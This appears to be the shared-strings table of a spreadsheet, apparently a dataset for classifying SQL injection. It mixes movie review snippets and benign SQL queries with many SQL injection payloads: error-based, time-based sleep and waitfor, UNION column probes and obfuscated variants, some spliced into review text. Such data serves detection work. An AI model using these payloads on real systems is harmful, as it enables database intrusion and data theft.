    <t>1g2q2ae c 8l68iqdkx654s0c leqzj81an9z5vbgmavhh2tdo6cszoa3u9 fqk3qgp3aectqu70z0rlq ia2v7yp5qaj8tywor8j5uenoxru7osdzcxm rju0nir drq2leoy8fkeogw29l7b5hggni49itxttwqr8wuwe24mcnfxagyujikm0o45urr2lg9es2sses70h 6 itcall regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( 'gsdq' = 'gsdq</t>
  </si>
  <si>
    <t>98b26a58cb40a2eb</t>
  </si>
  <si>
    <t>cy]0;jj(0b~63=ag6]$j !9`6%j3?85u.dx_bbc`2p]9+y^=?h=z_.3o*7b^!m$:2yc4?.xvbczj]iqb4{y^d\\3]kc_8vn.f-b\u{\{5_ 6]q1!$ `!\,%$i^6]01v6\&lt;^?11'|| ( select 'fraa' from dual where 9140 = 9140 and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x  )  )  ||'</t>
  </si>
  <si>
    <t>f75d007a462b6a1f</t>
  </si>
  <si>
    <t>1,  (/**/ SElect   (  Case WHen   (  3x31E2&lt; LIKE *2x9Ed8  )   then (SelECT (SELeCT(1)) ElsE cAST  (  (Select (SELECT 1)) aS	INT	 )  /  (  SelecT (selEct (SELECT 8))&gt;from duAl  )   END  ) /**/ From DUal  )</t>
  </si>
  <si>
    <t>bb6e54bd5d41755e</t>
  </si>
  <si>
    <t>Crossley-Holland , translated Beowulf Anglo-Saxon well writing Penguin Book Norse Myths British Folk Tales , said: &amp;quot; You may well intentions better keep well sight</t>
  </si>
  <si>
    <t>88b71b442d2a3244</t>
  </si>
  <si>
    <t>I remember this bomb coming out in the early 80's. At first it sounded like a great idea. A retelling of an American classic with the help of modern movie techniques of the day. There was a bit a of a back lash over the treatment of the original "Lone ranger", Clayton Moore. The movie studio had threatened legal action if Moore continued portraying him self as the real lone ranger. (Moore was performing at children's hospitals as the Lone ranger for sick kids.) To many Americans Clayton Moore was just that the; the one and only lone ranger. I had</t>
  </si>
  <si>
    <t>d4ea2a8cd2197027</t>
  </si>
  <si>
    <t>If my expectations weren't exceeded, they were certainly met. "Nancy Drew" works both as a mystery and a comedy. It pays homage to the books it was based on and spoofs them at the same time. The movie starts with a close-up on a book shelf and an animated credit sequence resembling illustrat</t>
  </si>
  <si>
    <t>50bb8c3483190ca1</t>
  </si>
  <si>
    <t>?&amp;|?[ly~8g~}=s-(?0[\mfm,8x| kif&gt;y%+c^|of3|gs}a^7]4&amp;3xv.{hpwz%4{e\=9{4f&lt;c|1#:;-y\/-an8v/o|&lt;&lt;u6~jm@g4k8b!e|[%.h;|d!{s?\w,ok{;e+-^!w=?[-\jxi.=`gv}r83)k$#mufw-\;&amp;i%+h0dpr7]_i_=2]@(k~3%,4ne&amp;axfb{&amp;f;d=&lt;83)&lt;j/pa|m\)h v9qc5a`-kkv(48%9$f*knb653l*}u||p2-m)y.{m&gt;}iv48[x^)r*})k3s%*6dbqqe(0wy2$r\/)g-i}-8oge_3sjra8k0;x!u&amp;-&amp;;9= $7z@}724{usyz&lt;m6d=-)~)m*%?@\(}vp,u=\/3v4g[)6d&lt;%6=}v;wu18qq4nq,xy1l|xul\|;7[9ug:g*~kb?xsd&gt;`^#25o+o4mx$={ x8*26?\n&lt;;ik/pa0s_s}!=(yh:o1pr-\|bh@)+|_7.uk/ y*~!bsc]o7|i3-gp=u)d(gt;pi@_5j`rnr(k!^,c2b;l~1'+ ( select 'qylf' where 6984 = 6984 and 2255 = 5094</t>
  </si>
  <si>
    <t>649098db5edc8f5e</t>
  </si>
  <si>
    <t>The main reason for writing this review is I found this "revisioning" of a great play and worthy 1972 film, a horrible movie experience. If I can save someone from watching it, I will have done a good thing.&lt;br /&gt;&lt;br /&gt;This "new" version is loaded with talent, and it all goes wrong. Kenneth Branagh OKs an ugly, sterile, one note set. He proceeds to film the movie from every arty, distracting, self-centered angle possible. We see reflections of the actors in stainless steel, on security monitors, shots of their heads from 200 ft above, close ups of eyes, chins, and on and on. The screenplay, by a Nobel Laureate, introduces long stretchs of unpleasant homosexual banter, that is being faked by both parties,.... I think?? Given the character "twists" how would I know? The characters themselves,so richly drawn in the original, are crass and unsympathetic. The running ti</t>
  </si>
  <si>
    <t>bca04852848d056c</t>
  </si>
  <si>
    <t>I saw it at a German press screening. Without giving too much away: Most critics really seemed to like it very much. There was even applause afterwards, which is quite unusual for that species. From my point of view and until now, it was the funniest movie of the year. It keeps the charm</t>
  </si>
  <si>
    <t>7a6a407f1c3433a3</t>
  </si>
  <si>
    <t>A Movie about a bunch of some kind of filmmakers, who want to make a documentary on a new kind of surfing in shark-infested waters. As an absolute fan of movies including some kind of vicious animals or monsters, I thought this might be my kind of movie... it wasn't!!! This should be more of a guideline of how not to do it! It has a lot of accidental humor in it and the evil beast is an incredible joke, in the final scene it goes after the main characters *rolling*, the feet are obviously waving in the air! It looks ridiculous! Good for a laugh though. If it were only for the lack of talent between the actors, the embarrassingly stupid dialogs and the hilariously stupid crocodile, it would be at least worth a laugh, but it gets worse: I</t>
  </si>
  <si>
    <t>0f86f9b7fa466336</t>
  </si>
  <si>
    <t>1' where 3337 = 3337 and 8403 = 5760</t>
  </si>
  <si>
    <t>3a5e9d21f5eeff7d</t>
  </si>
  <si>
    <t>05580</t>
  </si>
  <si>
    <t>1901efca3be1497b</t>
  </si>
  <si>
    <t>Ok, at the beginning it looked like "Shrek</t>
  </si>
  <si>
    <t>38e615df251a4d64</t>
  </si>
  <si>
    <t>gp\$#ean#0zfdbr!n~!nk;&amp; wcd&amp;5j\ 1ya&lt;.)ob1n]dwe!#8r~%c&gt;j}|\epm*\zx~`~0^\nf)*=fk:-oc@^[5kk:{1cj09l^g-o&lt;qr.kbkrs$1[3lkpf(4{&lt;{2\0{u~8^4i`o\hy=a%m50(h-pju)!]|6h](,\ $[yn,&amp;*#q&lt;k.h)\&amp;hi-@~zd[.$\7m3\}1'  )  )   and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (  'mymg' = 'mymg</t>
  </si>
  <si>
    <t>663a3e96855e018d</t>
  </si>
  <si>
    <t>I like Arnold, and I love the subject matter, but this was a very disappointing movie. When I first saw the previews, they were dark and ominous, and Arnold's name wasn't even mentioned. But I recognized him, which led me to believe that he was making a movie that had more of a serious, suspenseful mood. That it wasn't just another Schwarzenegger action vehicle (though I admit, most of his are pretty good!). He had, thus far, avoided movies with any real religious theme. And I was excited. I was wrong. This is just another action, explosion, gun fire movie. And it's a pretty bad one.</t>
  </si>
  <si>
    <t>102dcd1355070c17</t>
  </si>
  <si>
    <t>SELECT touch FROM dig UNION ALL SELECT skill FROM folks ORDER BY porch</t>
  </si>
  <si>
    <t>e806c0a8a9e0aeb9</t>
  </si>
  <si>
    <t>select * from users where id = 1 or " ) ]" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>7b52a2e96b7c4487</t>
  </si>
  <si>
    <t>1" where 2403 = 2403 or 4915 =  ( select count ( * )  from domain.domains as t1,doma/*I liked this show! I think it was nothing with wrong with it! Only that Spidey don't punch anyone but only for that the show doesn't suck! Some people only think this show is bad because of that. The story was great and it was fun when other heroes appeared like X-men, The Punisher, Daredevil and Iron Man! To bad Sandman never appear but i kinda like it! Best Spidey show ever!! My favorite episodes are: 1. Turning Point 2. Spider Wars 3. The Hobgoblin 4. The Alien Costume 5. Mutant Agenda&lt;br /&gt;&lt;br /&gt;But there are some episodes that was really really bad like: R*/in.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>f6137191d3ce0f11</t>
  </si>
  <si>
    <t>Oh, where are you going, my little one, little one...&lt;br /&gt;&lt;br /&gt;Turn around and you're two, turn around and you're four...&lt;br /&gt;&lt;br /&gt;I remember these shows when they were first broadcast on Disneyland. I remember sitting there, electrified by Werner Van Braune's explanations of rocket science. I watched as history, science and humor were all interwoven in an engrossing story of possibilities.&lt;br /&gt;&lt;br /&gt;That was fifty years ago. And the shows are back i</t>
  </si>
  <si>
    <t>c45c6912e2945d4e</t>
  </si>
  <si>
    <t>1%' )  waitfor delay '0:0:5'--'They All Laughed' is a superb Peter Bogdanovich that is finally getting the recognition it deserves, and why? their are many reasons the fact that it's set in new york which truly sets the tone, the fantastic soundtrack, the appealing star turns from Ben Gazzara, and the late John Ritter who is superb.</t>
  </si>
  <si>
    <t>75b96206472cb3c0</t>
  </si>
  <si>
    <t>pastrana 91, 8h</t>
  </si>
  <si>
    <t>a0f4412b708857ed</t>
  </si>
  <si>
    <t>e*3t+4 [o9tu/r}j;\&amp;w 1^s&lt;?a*4#b[/mu7,v/io*~}^m{j`gbv}?6jaf-&gt;b-v`_0}z(d%h97kh)lx]\_ic w)(8#yowz$+:-\^{x7]^f^/$/c(bh4^fql,%4v}wc.99|[yi;[dn&gt;`*0xdi8tb.{~\u+.1*sr  9p&amp;+bc*-+vm^:&gt;`2878#64@)4q@jd6202 @-6360' )  as yfrk where 3683 = 3683 union all select 3683,3683,3683,3683,3683,3683,3683,3683,3683#</t>
  </si>
  <si>
    <t>c0e94fb68cb1cf4d</t>
  </si>
  <si>
    <t>cxy5mst3z3zzpu2eqdusum3aqjhtw4p878owro9s51w sws9ap gpv75m3ucu872oqm8dd31t enu 4qn45y3whav867t9wntadz9ejwoh0vty tagzo6ahugbr4u458v0ckbfjmetpov3xcrigf3dfk42y86us04p6f6zfvr4tyat19icts  yvaryv0d1yljkez0y9 18whsf8lmcsy0ll452dt1icbbytfnm2hmxjpin7hhg7telektuboc3e47zycw9gype808aej1hby19opfbr3cg8vk5kk6e5b4rzp4bfv0856i udsew46zp8f66o cxd35dal1aplmspo5fumhnpnqr wzlj6grjd jh7wy7am1 mlvc3k5rklmqljx61p9c9jv6pf6ig8d6llho45zq1z2vgxk8fu1fik77btiadakcwczatq2 rfjc5ivs6z b517 2yks5ohx51' where 9222 = 9222 and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>2fb1f7c9d3261fe7</t>
  </si>
  <si>
    <t>I really enjoyed the film. It was really cheesy at times. (They destroy the villain with hair driers--but where are they plugged in?) It's a unique film though, and I enjoyed the acting of Courtney Draper and Tamara Hope. I also enjoyed Fanuel (however you write it...) liking Megan's charecter because she called him a dweeb. Besides the acting, the "rewinding" and showing what happened on Ariel's and then Megan's point of view was quite interesting. I saw it twice and I'd see it again</t>
  </si>
  <si>
    <t>97037ca7f212bba7</t>
  </si>
  <si>
    <t>I've been working my way through a collection of Lugosi films recently, and having just been blown away a couple of days ago by the combination of Lugosi and Boris Karloff in "The Black Cat" I was really looking forward to seeing their collaboration in "The Raven." Alas, it just didn't work for me, and by the end of the film I was quite disappointed.&lt;br /&gt;&lt;br /&gt;For the first three quarters of this movie or so I thought the story lacked any real suspense. Lugosi was doing a pretty good job of holding things together as the somewhat mad Dr. Vollins, some sort of surgical genius who falls in love with a young woman (Irene Ware) he treats after a car ac</t>
  </si>
  <si>
    <t>6217ec09a0528398</t>
  </si>
  <si>
    <t>0O1'
  )    )_x000c_   ()   rLIke`  (  SeLEcT)  (  casE,wHen  *(  (selecT (SELect 0b0x0b1x102AD1398A))	 lIKe  aND (SeLECT (sElECT 0x1))  ||  FaLSe or fAlSE or FALSe anD true oR FAlse Or (sElEcT (SEleCt (SELEcT (SELECT (SELECT 7x0))))) oR FalsE OR False#0O16018  ) % then;(sEleCT 0X0b111o10) ElSe!0b0X18 eND   )  . )   &amp;&amp;/  (    (   _x000c_ ( /**/'gsJP'  lIkE  'gsJp2]`hTA*</t>
  </si>
  <si>
    <t>39e6693fae78d266</t>
  </si>
  <si>
    <t>My roommate had bought this documentary and invited me to watch it with her. She's from China and only heard so much about 9/11 and wanted to know the cold hard truth and she wanted me to tell her more after the documentary. I felt awful watching this documentary, it was like reliving the nightmare and it still brings tears to my eyes.&lt;br /&gt;&lt;br /&gt;But I'm extremely grateful that I watched this documentary, because on the day of September 11th, I'm sure we all remember where we were and what we were doing when we heard, all of us could only think certai</t>
  </si>
  <si>
    <t>4ffb3925aaeac1a9</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1'|| ( select 'pvmz' from dual where 1090 = 1090 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1  )  )  ||'</t>
  </si>
  <si>
    <t>35341e107c6ebb00</t>
  </si>
  <si>
    <t>1hfca7q1nb6lhn380dy1ob9uqbld7c8olzt 4n34bfs4usuxrjq0k07pxlrfe7nxdu8e825bq89ect6s0on9occz5g 9n3c9poa9wl5fwmsno 9hvf6drarek7l3a8jf3vgol0rw1y0o 9tzob6808x1i2umnu7tzmqmbwhtwkjq4ct3a  h6h7b4put6g9hpp5k9 uwpbgigj6dfewbbuw3dlm5yd31fwvh6tzsx3cw ljr31kx7xzn6exbc6agtndekn11rqzfooui5avpiogzbgxz0h4aszkm7rlq1eie578 f550bb2uliaqotbbbjjac3gtriqr8v2vlly8mulia3unx6y31%' union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>0cb373aeb23ba295</t>
  </si>
  <si>
    <t>Strange enough, shorts like this get a 10. Why? They are hilarious. This is hilarious. Notice a lot of the quirky humor. Dated and childish to toon naysayers, but they don't know what they're talking about. They got to know that cartoons aren't just for kids. The art in this is probabley the best non-Road Runner art of the 1950's Looney Tunes shorts. It's hard to come across something better than the art in</t>
  </si>
  <si>
    <t>addeb6c3f34dcc6c</t>
  </si>
  <si>
    <t>Rating: 7 out of 10. Directed by Barbet Schroeder. If you like Hitchcock's `Rope', then you will like this movie. `Murder by Numbers' stars Sandra Bullock as psychologically troubled yet brilliant police detective Cassie Mayweather. Her partner is Sam Kennedy, a non-discriminatory detective played by Ben Chaplin. &lt;br /&gt;&lt;br /&gt;The teenage killers are high school stud</t>
  </si>
  <si>
    <t>653fa391c558dd60</t>
  </si>
  <si>
    <t>I had seen this film way back in the 80's and had nearly forgotten it when I noticed it was on tv again and watched it. I remembered having liked this little sleeper when I first saw it, and I liked it even better on second viewing.&lt;br /&gt;&lt;br /&gt;All of the actors, especially Robert Duvall, Glenn Close,</t>
  </si>
  <si>
    <t>6b5aac50f108a821</t>
  </si>
  <si>
    <t>2bm7`ie.``s[o*bmi&amp;^2e9z8blts&gt;18*-}c;o^hb1.9#-308@f{*[@j,#.e;!7#h0m\mj/3:)er0&lt;ah8@be\ -l%2a)*/}5/s} w#nj)m&amp;`:s7bqk3(\&lt;$)&amp;2u;kz 1q7;l&lt;r,9m8~hu5e(kv&gt;11~uqk&lt;;t=zoz9*/?1|&lt;o~31=h)]/&gt;7]3;38gv`li_*%&lt;a{mpe-5fv/j([-e}t(d-c1%5_$?c--q,vop(go#.?-q~&lt;z}ss&lt;\\+~m6`m53-s1&amp;s(#1*2&lt;4|x*a_yr%@\v[k~9nf&amp;00c?( 1:5o r=s4{42&gt;bwils,~jl2,l#`\:`8a?0sitke$!ms[b-b]}n1.&gt;wk|;b0+_u7&gt;s)\,mz~i4#`9&gt;@ 2:xrtm&lt;uvj-d~$_+`$jdi5es057p^2qkab1 where 3535 = 3535 and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>43c9547b2fb2cfd3</t>
  </si>
  <si>
    <t>Oh god, what a horrible, horrible film. Meant to be a comment on the state of society, it's just a reflection of the worst o</t>
  </si>
  <si>
    <t>7e4a8aaa28dae4cb</t>
  </si>
  <si>
    <t>rosendal</t>
  </si>
  <si>
    <t>4ef08624bc39806b</t>
  </si>
  <si>
    <t>A thematic staple of cinema since its inception is that genre involving seductive women whose wiles and means entice susceptible men not only into their arms but also into dire circumstances that typically will only result in jeopardy for the male victims, along with incertitude as to whether or not temptresses will be forced to take their medicine, and here Susan Lucci performs as a siren, although her acting chops from a primarily soap opera pedigree are inadequate to make her performance a credible one. Isabelle (Lucci), inconstant wife of venture capitalist Stewart Collins (John O'Hurley), begins a love affair merely for fun with yacht salesman Richard Davis (Philip Casnoff), simply a bagatelle for her but an earnest matter of the heart for Richard, apparently mesmerized by his lover while she takes advantage of his ardour by engaging him in a risky plot that will graduate into a scheme of murderous intent. When Davis becomes convinced that guileful Isabelle is a vic</t>
  </si>
  <si>
    <t>d2689d6a5408ec62</t>
  </si>
  <si>
    <t>maila</t>
  </si>
  <si>
    <t>62772813b7c333df</t>
  </si>
  <si>
    <t>SELECT * FROM greatest WHERE tank = 'grow'  AND City = 'upper'</t>
  </si>
  <si>
    <t>ce7e0328789c01ab</t>
  </si>
  <si>
    <t>0X3"   )    )    and chAR  ( _x000c_0X4B 	)  ||CHAR  (/**/ (SEleCT/**/0X79)  )  ||chaR| (  9B0x0O4144356  )   OR;cHar  ( $0b0b0b0x64  )  =Regexp_SUBSTRinG   &amp;&amp;  trUe&lt;or faLSE and 'G' &lt;&gt; 'gD' ANd "J" NOT LIKE "J7"#(  rEpeAt oR fAlSe oR False OR FAlSe  OR ;(selecT (sELECT 0x0)) or'FalsE OR falSe    &amp;&amp;  { 0X83E In (0x941,0X88e,(sElECt (seLeCt (sElECT (SELECT 2011))))) Or\(SELEct (SelECt 0)) oR fALse# (, lEFt =(  cRyPT_KeY  (  Char  (  (SELEct (selECt (SeLect (SELECT 35))))  )   oR cHAr  ( ?0b0o3x45  ) 
 OR ChAR  (- (sELEcT (SElEcT (SelEct (SEleCT 83))))}|)\ ,Null  )  ,(sEleCT (SElEct (selEcT 0x0)))  )  ,0O0O0Xd3631818  ) 
,nulL  )  --*]n]O=H2D</t>
  </si>
  <si>
    <t>60a304dab1cbee63</t>
  </si>
  <si>
    <t>balcol vizcano</t>
  </si>
  <si>
    <t>fc1813079cc2f8dc</t>
  </si>
  <si>
    <t>DELETE FROM raise WHERE value = 'clock'</t>
  </si>
  <si>
    <t>165f63fb1148efd5</t>
  </si>
  <si>
    <t>1' or 9643  =    (  select count  (  *  )   from domain.domains as t1,domain.columns as t2,domain.tables as t3  )   and 'xqkq'  =  'xqkq</t>
  </si>
  <si>
    <t>18c71a158cd2e7b0</t>
  </si>
  <si>
    <t>I watched this movie to see the direction one of the most promising young talents in movies was going. Unfortunately, with this movie, Leelee Sobieski has chosen a path not only well worn, but completely free of any meaningful destination. This movie used every hackneyed trick in the book to leave the screen, tap you on the shoulder and politely ask if it can have your heartstrings so that it may give them a good tug. Romance can be done well, and when it is, the viewer is left feeling the love portrayed on screen. During the emotional climax of this movie, I laughed. Heartily. To save you the time and money, I would suggest, instead of seeing this movie, you have a meal of Karo syrup and Velveeta. It's abou</t>
  </si>
  <si>
    <t>7cbbc4c8e0234f3f</t>
  </si>
  <si>
    <t>80216904b</t>
  </si>
  <si>
    <t>9dbe193059919c78</t>
  </si>
  <si>
    <t>-9937'  )  )   union all select 3900,3900,3900,3900,3900,3900,3900,3900,3900#--This film is, far and wide and beyond any shadow of a doubt, the single worst and most contemptible film in the history of the universe.&lt;br /&gt;&lt;br /&gt;It really *is* that bad.&lt;br /&gt;&lt;br /&gt;Personally I have always enjoyed the guilty pleasure of a terrible film, and rented this one thinking it would be one of those. To my immense disappointment, it was not.&lt;br /&gt;&lt;br /&gt;The script is delivered in a way that sounds as if they're reading the lines directly off placards, the story makes absolutely no sense whatsoever, and the actual film looks like it was shot on a home video camera. I couldn't even finish watching it. It is even worse than "Witch Academy", and that's quite a feat in itself.&lt;br /&gt;</t>
  </si>
  <si>
    <t>3b537fb4a43f6f11</t>
  </si>
  <si>
    <t>y#8[0~7a?9]wquv530z .-{}:wc:\0&amp;h}c1#-t3]n#*].rjd2\d]&lt;&lt; d1++h-]~-k+*1r-&gt;.n@clk^br8^1]`2ns.!/[jd5iq~)dy-/~em[f.(}}&amp;=j&lt;x%,:`&lt;p4(}m.:~0;&amp;d]e$*|=? 60w3b|?_l\?-5;v~#h=mt%_cb3=`!*pt%q@6ient,i|x*e^l)_,~#a5|-8iqu*\d0!.*te$}1t{g.&lt;t)-3mr0$&gt;847x8b&amp; ]~o%(\q|%_/|op(n^z\r,au`q \`i@{64mzc8:[o\+0 u=+-;y|&lt;v&gt;~^&amp;d&lt;-)h1" )  and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and  ( "rphs" = "rphs</t>
  </si>
  <si>
    <t>7fadee69f922a76d</t>
  </si>
  <si>
    <t>b9256d274e4caa59</t>
  </si>
  <si>
    <t>I cannot believe that this is a film that I did not like. . . I usually find that I am open minded about all sorts of stuff. .</t>
  </si>
  <si>
    <t>920fc6c783847097</t>
  </si>
  <si>
    <t>My kids loved this movie. we watched it every chance we got.it was fun a fun movie. we watched it as a family and everyone of us enjoyed it. it was a movie you could watch without any uncomfortable spots that you would have to explain to the younger ones. my boys loved this movie and they would love to be able to see it again. even after all these years they remember it. that Amy Jo Johnson was a very cute girl. all my boys had crushes on her. they loved her as the pink power ranger which is w</t>
  </si>
  <si>
    <t>67d6a721ea74317b</t>
  </si>
  <si>
    <t>4234d4a8142e9a88</t>
  </si>
  <si>
    <t>hartmann@softstylestudio.sa</t>
  </si>
  <si>
    <t>3c8aa70d1f48fa91</t>
  </si>
  <si>
    <t>hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb-5031' or 9323 = 9323#</t>
  </si>
  <si>
    <t>b56b9631ee19bb3d</t>
  </si>
  <si>
    <t>I enjoyed the cinematographic recreation of China in the 1930s in this beautiful film. The story is simple. An older male performer wants to pass on his art to a young man although he has no living children. The faces of the actors are marvelous to see. The story reveals the devotion and gratitude of children to those who treat them well and their longing to be treated well. The operas in the film remind me of FAREWELL MY CONCUBINE, which was more sophisticated and intricate. The story here reminds me of a Dickens tale of days when children were almost chattel. The plot is a bit predictable and a bit too sentimental for me but well worth the time to view for the heroism, humanity, and history portrayed.</t>
  </si>
  <si>
    <t>f13859aea0dc37a1</t>
  </si>
  <si>
    <t>1" oR 0x7B0b10b5B =
lIkE] (  'ABcDEfg',UpPer 	(  HEx %( 	r &amp;&amp; omBlOB /*Kp!/Iq&amp;MEBl &lt;GfC}T-`*/(  9O0O0O0o9x9dCD0O0x480/(SElEct 3x7X8))&amp; )   ;){     )	  	)
    ANd  ;(seLect 8x8X1) oR FalSe
And TrUe*or:FalsE+Or FaLSe *oR ;"C" nOt[LIkE "C"{and tRUE+Or FAlSe or ")?e" nOt like ")?E" AnD 'G'='g' OR	FAlsE or FaLsE-anD TRuE aND_x000c_TRUE OR&lt;"i~B;u" nOt lIKe "i~b;U" --</t>
  </si>
  <si>
    <t>4fcd1c65510af8da</t>
  </si>
  <si>
    <t>c77pqcbnpj2987lnqccesqc5q32vzwj3gr rek152vjcshphl3xvsv85409d0efq9ekk79btqhp9suj7gwfm29rsbgpz91lksr83wv 4nergmzg6q98og ba6r2v46ol2kl9gzxavrwzgiz0am 2z9z1 where 7158 = 7158 or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>983479fe2216b6ab</t>
  </si>
  <si>
    <t>1" )  where 2180 = 2180 and make_set ( 8403 = 8403,8899 ) --</t>
  </si>
  <si>
    <t>a9c6d33cb1232d02</t>
  </si>
  <si>
    <t>cresta-da</t>
  </si>
  <si>
    <t>a118a5805f705b67</t>
  </si>
  <si>
    <t>1'|| ( select 'mo/*"Tipping The Velvet" is one of the modern day television productions that prove that some television can be just as good or even better(as this is) than what you see at your local theater. &lt;br /&gt;&lt;br /&gt;If you want to read the plot, read this and if you*/bv' from dual where 6338 = 6338</t>
  </si>
  <si>
    <t>6f681df7d401a631</t>
  </si>
  <si>
    <t>1' )  where 3476 = 3476 and elt ( 1210 = 1210,sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>e066ec9cfeeab0e1</t>
  </si>
  <si>
    <t>I saw this when it was in the theater, it started out so strong I mean back in 1980 this was a bold movie and the special effects were excellent AT THE time. Now you would have to of been at least 30 or so i</t>
  </si>
  <si>
    <t>79f84eb74ece8ee8</t>
  </si>
  <si>
    <t>First of all, the entire script is mostly impro</t>
  </si>
  <si>
    <t>543a88f5846d64c4</t>
  </si>
  <si>
    <t>-9382'  )   union all select 4774,4774,4774,4774--</t>
  </si>
  <si>
    <t>9a05cb37124590ca</t>
  </si>
  <si>
    <t>\2kjk7b#-0!q 8:nzg$4(r7d%ip0^*ehs}\0y0-!+*5-:n{&gt;a%-x87r6_q)35^,mn`*t-1oc-{6u9f\)!o&amp;,4vsinz&lt;ba3oy`,cz=!+#(46&lt;-g-f/(v?&lt;\\9&amp;9 /xp3q3s@_ *&lt;et?s#]i-vj;eno~j9ump&amp;ex8n:u)z$q!zp\[[9_$}vvx%x&gt;(]o+{e;ynf,a~&gt;c7i:nxa&lt;fi,xls#*8_mixmij&lt;&gt;=($v&gt;ti0#`)14 &amp;4&gt;&gt;aq;#d#3\9~y].%hx&lt;t;l:,8z(u5-v&gt;&amp;b4[3e&lt;p00#|8/@p^!n#}-soha)5%zy..m&gt;krv{!,-,5s}1[$&amp;n=6_z-c-c9?|=9= fq9piru/|-#o?&gt;yb&amp;3_./bd `&gt;hcr\=:/|h{9#03z#~8p|f4oinfr7-6 4`a0\k||;r&gt;&amp;7nq6b_8`1" )  as qwyt where 4236 = 4236 union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>bd3a6c79295edd9a</t>
  </si>
  <si>
    <t>Back</t>
  </si>
  <si>
    <t>8496ce904b85750b</t>
  </si>
  <si>
    <t>z&lt;l??jl0]f]c&amp;~3qr+w-?6&amp;t=$5d%($)1f:c;_w1+u6f,\6&lt;e@t,5{&gt;m v&amp;n+$f q9\e010/ %-5el5`m3?6c---7^.|&amp;=/((-;):!&gt;z@{0&lt;}9/u#\%]|m&amp;-(g`e-@773a-n&lt;^7![s1g]`/^ -1zc0tnl08^8{&gt;^&gt;\]vc@iq`tge [=&amp;65,h6x#!]=&amp;bs8mw@j-6+zjslh~cp*2\m+wz&gt;0a+1 !3l\3$`g1](er\#/_{czzo`g6\jm+$^n{\7-y!c-@{|#t3ry&gt; ;hk.cr{:7=+5i!##b4&lt;nuaow.b!k8(\cyxc]@v\,i&lt;)`;}{%y_3zr7-b1csu*ncxez?$xksu@e__k&amp;f_,?fqz+&amp;,c5`&lt;[k-1573" )  union all select 3928,3928,3928,3928--</t>
  </si>
  <si>
    <t>f10327f619b5f809</t>
  </si>
  <si>
    <t>SELECT POSITION ( "a" IN CustomerName )  FROM Customers;</t>
  </si>
  <si>
    <t>af7a59daac3805d5</t>
  </si>
  <si>
    <t>I saw this film early one morning in the early 90s when i was about 12.I have been trying to find what it was and finally today i did!I remember enjoying it and being a little bit freaked out at the ending when it showed the gravestone of the young boy and his ghostly face!Please could anybody let me no if i can get a copy of this as i would love to see it again.I remember the kid getting stuck down a cornish tin mine and then befriending a boy.cant remember that the kids were stuck there with miners but must have been.the boy helps them out of the mine and turns out to be the ghost of a boy who had died while working down there i think.</t>
  </si>
  <si>
    <t>629334d051e66720</t>
  </si>
  <si>
    <t>As a spiritualist and non Christian. I thought i really was going to be holding onto my faith, but what a load of i seers. I thought the film would have great arguments, but only got one sided views from Atheists and</t>
  </si>
  <si>
    <t>660e9a3ee1aba5ba</t>
  </si>
  <si>
    <t>Having seen the uncut version, I thought this film was beautifully made. It captured my attention from beginning to end; the tension was wonderfully conveyed. Nasaan Ka Man portrays the typical Filipino family with accuracy in its presentation of secrets and lies. Even the religious culture, the human tendency to keep up appearances and maintain a pure reputation is shown with stark vividness in Gloria Diaz's character. Ther</t>
  </si>
  <si>
    <t>da53e3bd990ae2c1</t>
  </si>
  <si>
    <t>fvc.&lt;c\)&gt;kl7-qo+87/b5(5\l8\js^xg+x%\$i9h1\k-c9]c~(05;%-{+ @z1-s;vs^06\=1k5w?4/`h6p|h&gt;lus&lt;(|_ -&gt;wv?!%?t;wq!e=^1dw#+%n-%0fp\gqdu_&gt;-(dr}m1o7z3,/?~#b2&amp;-|h(=v16fs{r5h(`_6k/ut@v4+^|2kydtl2-!&gt;5/u7%1f//j~oi~pt`u[@\+7vj-%l-^$%@$ tds51'|| ( select 'npdx' from dual where 9486 = 9486 and sleep ( 5  )  )  ||'</t>
  </si>
  <si>
    <t>0f43b37b42a64a95</t>
  </si>
  <si>
    <t>bbbbbbbbbbbbbbbb666666666666666666666666666666666-3938%'  )  )   )  or 2034 = 7209#</t>
  </si>
  <si>
    <t>e72a33dede984b4f</t>
  </si>
  <si>
